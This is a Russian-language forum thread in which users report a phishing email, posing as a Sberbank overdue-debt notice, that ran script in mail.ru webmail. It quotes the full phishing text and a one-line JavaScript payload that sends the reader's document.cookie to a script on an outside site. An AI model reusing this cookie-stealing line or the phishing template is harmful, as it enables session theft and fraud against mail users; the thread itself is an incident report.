Вирус по почте.

[alexandrov_s]

Сейчас на почту пришло письмо якобы от сбербанка. Почту получаю почтовым клиентом в опере. При попытке выделить текст опера зависает и забирает 3,5 Гб памяти.

Текст письма небольшой, но скролбары показывают, что в теле есть еще очень много символов. Почуяв неладное зашел на mail.ru через браузер (каюсь не надо было, пароли уже сменил), открыл то самое письмо хотел выделить текст и тут же выполняется яваскрипт примерно следующего содержания.

Все бы ничего, но вот url в начале скрипта до боли знаком наверное не только мне и принадлежит известному в сапе форумчанину. Что думаете по этому поводу?

[Клон]

ну не зря он клона регил на другое имя

[D.iK.iJ]

Пересылка с mail.ru почты => Яндекс почту рулит Спама и вирусов меньше в разы.

[Последний Герой]

Цитата:

Сообщение от alexandrov_s

примерно следующего содержания.

а что за файл в блокноте вы открыли? его содержание никак на скрипт не похоже.

исходный код письма в паблик можно?

[сумрак]

Спасибо ПГ за своевременный ахтунг в аську...

Итак по порядку:

Всем доброго времени, ночи, утра, дня, вечера...

Честно скажу, что отношения к данному письму не имею, а даже более - точно такое же письмо получил сегодня и я, вот текст его содержимого (вырезка из самого письма) :

Цитата:

"Сбербанк России"<kredfl@sbrf.ru>
От кого: "teasernet.com" <no-reply@TeaserNet.com>
Кому: ****@mail.ru
20 августа 2012, 23:02
20 Августа 2012

Здравствуйте!
Настоящим сообщаем Вам о наличии просроченной задолженности по банковской карте VISA8330, полученной Вами в ОАО "Сбербанк России" (далее – Банк). На 27.11.11 сумма просроченной задолженности составляет 183.12 RUB.
Несоблюдение условий обслуживания банковской карты влияет на Вашу кредитную историю. В будущем, при рассмотрении вопроса о предоставлении Вам другого кредита, данное обстоятельство может негативно повлиять на решение Банка о возможности его предоставления. Для погашения просроченной задолженности Вам необходимо обратиться в отделение (дополнительный офис) Банка или погасить задолженность иными способами, указанными в Условиях обслуживания банковской карты ОАО "Сбербанк России".
По всем возникающим вопросам о просроченной задолженности Вы можете обратиться по телефону 8-800-700-22-20 (звонок по России бесплатный) либо направить сообщение по адресу электронной почты help@sbrf.ru. В сообщении укажите причину Вашего обращения, Ваш телефон и желаемое время звонка. Оператор позвонит Вам и ответит на Ваши вопросы в удобное для Вас время.
Приносим свои извинения в случае, если Вы погасили свою просроченную задолженность до получения Вами настоящего письма. Со своей стороны, мы ценим Ваше ответственное и аккуратное отношение к исполнению своих обязанностей по кредитному договору.

С уважением,
Подразделение по работе с просроченной задолженностью физических лиц ОАО "Сбербанк России".

Я даже не знал почту Алексея, точнее будет не вспомнил бы, если она мне и сообщалась...

Увидев в теле вашего (Алексея) письма урл - удалил папку "cor" - завтра сменю все пароли...

Прошу прощения, если такой инциндент мог иметь место с сайта x-bus.ru , но даю честное слово, что это не моих рук дело, а злоумышленников.

Готов предоставить необходимый доступ ПГ или Алексею, к самому сайту, для выявления вредителей, если им будет интересно заняться данной процедурой...

С Уважением ко всем форумчанам !!!

[alexandrov_s]

Цитата:

Сообщение от Последний Герой

а что за файл в блокноте вы открыли? его содержание никак на скрипт не похоже.
исходный код письма в паблик можно?

Этот текст выходит в браузере при клике по письму, перед этим все виснет на несколько секунд. В адресной строке в этот момент

Код:

javascript:delf=document.getElementById('delf');delf.style.display='none';img=new Image();img.src="http://x-bus.ru/cor/s.php?"+document.cookie;

А как посмотреть исходный код письма?

Добавлено через 4 минуты

Цитата:

Увидев в теле вашего (Алексея) письма урл - удалил папку "cor" - завтра сменю все пароли...

Уж удалять не нужно было, можно было отследить, что там за скрипт. Очень похоже что куки ворует.

Добавлено через 5 минут

Цитата:

Сообщение от Последний Герой

а что за файл в блокноте вы открыли? его содержание никак на скрипт не похоже.
исходный код письма в паблик можно?

Только что что понял, что это мои куки.

[сумрак]

Цитата:

Сообщение от alexandrov_s

Уж удалять не нужно было, можно было отследить, что там за скрипт. Очень похоже что куки ворует.

Мне просто не хотелось даже оставлять на доли секунд после выявления эту папку - она явно ничего хорошего не даст.

[Последний Герой]

Цитата:

Сообщение от alexandrov_s

Этот текст выходит в браузере при клике по письму, перед этим все виснет на несколько секунд. В адресной строке в этот момент

в вебинтерфейсе майла тоже самое? напишите в их саппорт. там не должны скрипты выполнять в письмах.

Добавлено через 31 секунду

Цитата:

Сообщение от сумрак

Мне просто не хотелось даже оставлять на доли секунд после выявления эту папку - она явно ничего хорошего не даст.

а она была??